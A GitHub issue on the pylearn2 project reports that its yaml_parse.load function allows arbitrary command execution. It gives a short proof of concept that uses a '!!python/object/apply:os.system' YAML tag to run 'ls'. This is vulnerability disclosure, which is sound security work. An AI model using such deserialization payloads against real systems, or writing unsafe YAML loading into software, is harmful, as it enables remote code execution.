Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

yaml_parse.load method is vulnerable #1593

Open
bigbigliang-malwarebenchmark opened this issue Dec 11, 2018 · 1 comment
Open

yaml_parse.load method is vulnerable #1593

bigbigliang-malwarebenchmark opened this issue Dec 11, 2018 · 1 comment

Comments

@bigbigliang-malwarebenchmark

import pylearn2.config.yaml_parse
test_str ='!!python/object/apply:os.system ["ls"]'
test_load = pylearn2.config.yaml_parse.load(test_str)

Hi, there is a vulnerability in load methods in pylearn2.config.yaml_parse.py,please see PoC above. It can execute arbitrary python commands resulting in command execution.

@nouiz
Copy link
Member

nouiz commented Dec 11, 2018 via email

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants